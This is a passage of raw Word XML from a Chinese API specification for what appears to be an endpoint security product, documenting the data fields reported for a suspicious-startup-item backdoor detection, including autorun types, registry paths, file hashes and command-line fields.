        <w:t xml:space="preserve">        "module_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extend_ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x09000000"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3A162" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="495" w:name="_Toc115166320"/>
      <w:bookmarkStart w:id="496" w:name="后门类型可疑启动项"/>
      <w:bookmarkEnd w:id="494"/>
      <w:r>
        <w:t>后门类型：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>可疑启动</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p w14:paraId="4682F030"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1793"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="708E5F6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8453522" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02142F13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5E9796" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EA2B5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CF27BEB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20EF03B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C6DF207" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70EA9DA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73AF08D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="451450C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D88A430" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>extend_ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E0F99A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5786A22A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630800D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回扩展code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59B9853D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="376BCFFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E16F3C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1191FA99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28477E00" w14:textId="4B86FC76" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程信息，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "processinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>process_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14EA0B44" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D395AB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>autorun_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C58F07F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B0F1AD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D84A63B" w14:textId="14901768" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动项信息，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "autoruninfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>autorun_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71BEDD7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="497" w:name="_Toc115166321"/>
      <w:bookmarkStart w:id="498" w:name="autoruninfo数据结构"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>autorun_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="796AD21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243B736" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD87273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CAB8BD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C202CFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BAAD20A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="120B3ABD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>autoruns_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D931E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E5C9BE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D5A1BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动项的类型 1 用户登录启动 2 系统启动 4 计划任务 8 系统服务 16 系统驱动 32 Explorer 64 已知DLL 128 IE 插件 256 Security Providers 512 Network Provider 1024 Print Monitor 2048 视频解码器 4096 WMI对象 16384 移动到启动文件夹 32768 其他杂项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33F324C3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33487F35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>reg_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F44E938" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B408CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C252E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动项目的注册表路径，可能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B1F28D1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D61333" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>reg_value_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CAB5482" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D5D5EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7C7848" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动项目的注册表值名称，可能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0964DC09" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156D986B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287D0715" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F856BAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C80846C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动项目最终运行的文件的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5777D1B9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D59EC9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD6DE02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="370FDB8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76668E8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动项目最终运行的文件的md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C723BD0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB59507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1322F9D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD6C3AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D1DD49C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动项目最终运行的文件的大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F8FA9F3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756D7DEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comand_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="048474D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="688244AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68917703" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="042E3BF2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35778C6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4652C71A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AD0F4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A30FB87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性，无效时为INVALID_FILE_ATTRIBUTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F957B0A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CBE547B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CBBDAE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
